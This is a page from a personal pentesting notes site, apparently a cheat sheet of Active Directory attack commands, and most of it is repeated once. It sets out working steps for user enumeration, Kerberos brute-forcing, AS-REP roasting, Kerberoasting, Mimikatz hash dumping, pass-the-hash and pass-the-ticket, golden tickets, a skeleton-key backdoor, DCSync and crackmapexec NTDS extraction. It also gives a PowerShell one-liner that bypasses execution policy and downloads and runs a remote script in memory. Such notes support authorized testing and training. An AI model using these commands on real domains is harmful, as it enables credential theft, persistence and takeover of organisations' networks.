AD | My Pentesting Space

AD Reconnaissance

Returns user on the machine

net user

Show the current user

whoami

Show the current group

whoami /groups

Show users from any group

net user /domain

Shows every user's group

net user [username] /domain

Powershell cmd to get all properties of a certain user

Get-ADUser -filter {name -like "sys.varonis.sql*"} -Properties *

Build LDAP filter to look for users with SPN values registered for current domain

$ldapFilter = "(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry
$search = New-Object System.DirectoryServices.DirectorySearcher
$search.SearchRoot = $domain
$search.PageSize = 1000
$search.Filter = $ldapFilter
$search.SearchScope = "Subtree"
$results = $search.FindAll()
$Results = foreach ($result in $results) {
    $result_entry = $result.GetDirectoryEntry()
    $result_entry | Select-Object @{ Name = "Username"; Expression = { $_.sAMAccountName }}, @{ Name = "SPN"; Expression = { $_.servicePrincipalName | Select-Object -First 1 }}
}
$Results

Domain Discovery

# Identify the domain
net view /domain

# List of users in the domain
net user /domain

# List of groups on the domain
net group /domain

# Display list of file and printer shares on a specified computer
net view \\computerName

# Display shares including hidden shares on a remote computer
net view \\computername /all

# List of shares on a remote Netware computer
net view /network:nw

# List all available servers on a specified domain
net view /domain:[domain name]

# Find the domain name of the current system
systeminfo | findstr /B /C:"Domain"

# Find logged in user's domain
echo %userdomain%

# Find domain name using WMIC
wmic computersystem get domain

Kerberos Reconnaissance - PRE-Auth

Bruteforce for valid usernames in the pre-auth process of a DC

./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/Active-Directory-Wordlists/User.txt

Bruteforce passwords for a specific user

./kerbrute bruteuser --dc cpent.localnet -d cpent.localnet /usr/share/wordlists/Active-Directory-Wordlists/Pass.txt administrator

AS-REP Roasting

Identify users that have Kerberos preauthentication disabled

Get-aduser -filter { UserAccountControl -band 4194304 } | foreach {
    $User = $_
    Get-ADPrincipalGroupMembership -Identity $User | Select-Object @{ Name = "User"; Expression = { $User.SAMAccountName }}, DistinguishedName, SAMAccountName
} | Export-Csv test.csv

Rubeus on Windows

Rubeus.exe asreproast

Harvest TGT every 30 seconds

Rubeus.exe harvest /interval:30

Perform a password spray against all found users

Rubeus.exe brute /password:Password1 /noticket

Perform Kerberoasting

Rubeus.exe kerberoast

Crack AS-REP hashes with hashcat

hashcat -m 18200 hash.txt Pass.txt

Mimikatz Commands

Ensure administrator privileges

privilege::debug

Elevate privileges to system

token::elevate

Dump NTLM hashes

lsadump::sam

Pass the hash

sekurlsa::pth /user:administrator /domain:. /ntlm:b8699d84246004a8d6f

Metasploit Commands

Dump all hashes and crack them with hashcat

lsa_dump_sam

Export all .kirbi tickets

sekurlsa::tickets /export

Perform pass the ticket attack

kerberos::ptt <ticket>

Verify impersonated ticket

klist

Dump the hash of the service account "krbtgt"

lsadump::lsa /inject /name:krbtgt

Get list of all users from ldap

use auxiliary/gather/ldap_query
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET

Get SPN from metasploit

use auxiliary/gather/ldap_query
set action ENUM_USER_SPNS_KERBEROAST
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET

Golden and Silver Tickets

Request a golden ticket

kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500

Open a new elevated command prompt with the given ticket

misc::cmd

Maintain access with a skeleton key

misc::skeleton

DCSync

Extract hashes stored in NTDS.DIT

lsadump::dcsync /domain:cpent.local /all /csv

Kerberoasting from Linux

Get TGT from domain after password compromise

impacket-GetUserSPNs -dc-ip 172.25.170.80 ECC.LOCALNET/administrator

Request a TGS ticket and crack it with hashcat

impacket-GetUserSPNs -dc-ip 10.10.187.117 CONTROLLER.local/administrator -request

Crackmapexec Commands

Extract LSA hashes

crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --lsa

Extract NTDS database

crackmapexec smb -u username -p 'password' -d domaincontroller IPDomainController/ --ntds

Extract SAM database

crackmapexec smb -u username -p 'password' -d domaincontroller IPDomainController/Anotherdomainjoinedserver --sam

Perform Kerberoasting

crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --kerberoasting output.txt

Hashcat hash cracking

Crack NTLM hashes

hashcat -m 1000 -a 3 hash.txt

Crack Kerberos hashes

hashcat -m 13100 kerberoshash -a 0 -o results.txt /usr/share/wordlists/Active-Directory-Wordlists/Pass.txt

Crack AS-REP Roasting accounts

hashcat -m 18200 hash.txt Pass.txt

John the Ripper hash cracking

Crack NTLM hashes with John

john --format=nt hash.txt

Powershell Commands

Identify users with Kerberos preauthentication disabled

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties useraccountcontrol | Format-Table name

Run Invoke-Kerberoast with PowerShell

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1'); Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash0.txt"

This one-liner instructs PowerShell to relaunch with the ExecutionPolicy set to bypass, enabling untrusted scripts to be run. It downloads the Invoke-Kerberoast.ps1 script, runs it in RAM, and outputs the results ready to crack using hashcat.

nbtstat -a IP

Nmap for smb

nmap -p 445,138,139 --script=*smb*

Mimikatz Commands

# Ensure the command outputs [output '20' OK] to check for administrator privileges
privilege::debug

# Elevate privileges to system level
Token::elevate

# Dump the NTLM hashes from Mimikatz in Windows
lsadump::sam

# Pass the NTLM hash to gain access as the administrator
sekurlsa::pth /user:administrator /domain:. /ntlm:b8699d84246004a8d6f

# Use PsExec to execute commands on a remote machine within the same internal network
PsExec.exe \\172.25.170.110 cmd.exe

# Dump all hashes from Metasploit and crack them with Hashcat if it's an NTLM hash
lsa_dump_sam

# Export all Kerberos tickets into the current directory
sekurlsa::tickets /export

# Perform a "pass the ticket" attack using the harvested ticket
kerberos::ptt 

# Verify the successful impersonation of the ticket by listing cached tickets
klist 

# Dump the hash of the krbtgt service account
lsadump::lsa /inject /name:krbtgt 

# Dump the hash of a specific service account (SQLService)
lsadump::lsa /inject /name:SQLService 

# Request a silver ticket for a specific resource by changing the account name
lsadump::lsa /inject /name:Administrator 

# Generate a golden ticket for domain access
Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:72cd714611b64cd4d5550cd2759db3f6 /id:500

# Open a new elevated command prompt with the given ticket
misc::cmd 

# Backdoor access through Mimikatz by implanting a skeleton key into a domain controller
misc::skeleton 

# Example commands to access shares without needing the administrator's password
net use c:\\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
dir \\Desktop-1\c$ /user:Machine1 mimikatz

Hash Extraction and Ticket Management

# Extract hashes stored in NTDS.DIT and output as CSV
lsadump::dcsync /domain:cpent.local /all /csv 

# Load the Kiwi module for Kerberos
load kiwi 

# Request a Kerberos ticket for SPN found by the LDAP query module
kiwi_cmd kerberos::ask /target:https/TSTWLPT1000000 

# List current session tickets
kerberos_ticket_list 

# Export service tickets using Kiwi extension
kiwi_cmd kerberos::list /export 

# Inject a new ticket into memory for authentication
kiwi_cmd kerberos::ptt Administrator.kirbi 

# Convert the .kirbi hash to a John or Hashcat compatible format
python3 kirbi2john.py ~/1-40a10000-Administrator@HTTP~testService-EXAMPLE.COM.kirbi 

# Crack the encrypted password using hashcat with the specified mode
hashcat -m 13100 --force -a 0 hash.txt wordlist.txt

Active Directory Reconnaissance

# AD Reconnaissance commands
net user          # Returns users on the machine
whoami            # Displays the currently logged-in user
whoami /groups    # Shows groups for the current user
net user /domain  # Shows users from all groups in the domain

# Get properties of a specific user
Get-ADUser -filter {name -like "sys.varonis.sql*"} -Properties *

# Build an LDAP filter to find users with registered SPN values
$ldapFilter = "(&(objectClass=user)(objectCategory=user)(servicePrincipalName=*))"
$domain = New-Object System.DirectoryServices.DirectoryEntry 
$search = New-Object System.DirectoryServices.DirectorySearcher 
$search.SearchRoot = $domain 
$search.PageSize = 1000 
$search.Filter = $ldapFilter 
$search.SearchScope = "Subtree" 
$results = $search.FindAll() 

# Display SPN values from returned objects
$Results = foreach ($result in $results) { 
    $result_entry = $result.GetDirectoryEntry() 
    $result_entry | Select-Object @{ Name = "Username"; Expression = { $_.sAMAccountName } }, @{ Name = "SPN"; Expression = { $_.servicePrincipalName | Select-Object -First 1 } } 
} 
$Results

Domain Discovery Commands

# Domain discovery commands
net view /domain                    # Identify the domain
net user /domain                    # List users on the domain
net group /domain                   # List groups on the domain
net view \\computerName             # Display shares on a remote computer
net view \\server.domain\share$     # Show shares including hidden shares
net view /network:nw                # List shares on a Netware computer
net view /domain:[domain name]      # List all servers on a domain
systeminfo | findstr /B /C:"Domain" # Find the domain name
echo %userdomain%                   # Display logged-in user's domain
Wmic computersystem get domain      # Find domain name with WMIC

Metasploit and Kerberoasting

# Use Metasploit's LDAP query auxiliary module
use auxiliary/gather/ldap_query 
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET 

# Get SPNs from Metasploit
use auxiliary/gather/ldap_query 
set action ENUM_USER_SPNS_KERBEROAST 
run rhosts=172.25.170.80 username=administrator password=Pa$$w0rd123 domain=ECC.LOCALNET 

# Nbtstat command to check NetBIOS statistics
nbtstat -a IP 

# Nmap command for SMB services
nmap -p 445,138,139 --script=*smb*

Kerberoasting from Linux

# Kerberoasting from Linux
impacket-GetUserSPNs -dc-ip 172.25.170.80 ECC.LOCALNET/administrator   # Get TGT from domain
impacket-GetUserSPNs WS2012-DC/cpent:Pa$$w0rd123 -dc-ip 172.25.170.110   # Request TGS ticket
impacket-GetUserSPNs -dc-ip 10.10.187.117 CONTROLLER.local/administrator -request 

# Crack SPN with hashcat after Kerberoasting
hashcat -m    # Adjust  and files as needed

Kerberoasting from Windows

# Kerberoasting from Windows with options available
Getusersspns.py htb.local/asmith:passw0rd  # Get SPNs with cracked user
Getusersspns.py htb.local/asmith:password -request  # Request a TGT

CrackMapExec Commands

# CrackMapExec commands for various tasks
crackmapexec smb -u username -p 'password' -d  --lsa # Extract LSA hashes
crackmapexec smb -u administrator -p 'Pa$$w0rd123' -d ECC.LOCALNET 172.25.170.80 --lsa # Example command

Powershell Command

# Powershell to bypass execution policy
powershell -ep bypass

PreviousBasics NextAAD

Last updated 1 year ago

hashtagAD Reconnaissance

hashtagDomain Discovery

hashtagKerberos Reconnaissance - PRE-Auth

hashtag AS-REP Roasting

hashtagRubeus on Windows

hashtagCrack AS-REP hashes with hashcat

hashtagMimikatz Commands

hashtagMetasploit Commands

hashtagGolden and Silver Tickets

hashtagDCSync

hashtagKerberoasting from Linux

hashtagCrackmapexec Commands

hashtagHashcat hash cracking

hashtagJohn the Ripper hash cracking

hashtagPowershell Commands

hashtagHash Extraction and Ticket Management

hashtagActive Directory Reconnaissance

hashtagDomain Discovery Commands

hashtagMetasploit and Kerberoasting

hashtagKerberoasting from Linux

hashtagKerberoasting from Windows

hashtagCrackMapExec Commands

hashtagPowershell Command

AD Reconnaissance

Domain Discovery

Kerberos Reconnaissance - PRE-Auth

AS-REP Roasting

Rubeus on Windows

Crack AS-REP hashes with hashcat

Mimikatz Commands

Metasploit Commands

Golden and Silver Tickets

DCSync

Kerberoasting from Linux

Crackmapexec Commands

Hashcat hash cracking

John the Ripper hash cracking

Powershell Commands

Hash Extraction and Ticket Management

Active Directory Reconnaissance

Domain Discovery Commands

Metasploit and Kerberoasting

Kerberoasting from Linux

Kerberoasting from Windows

CrackMapExec Commands

Powershell Command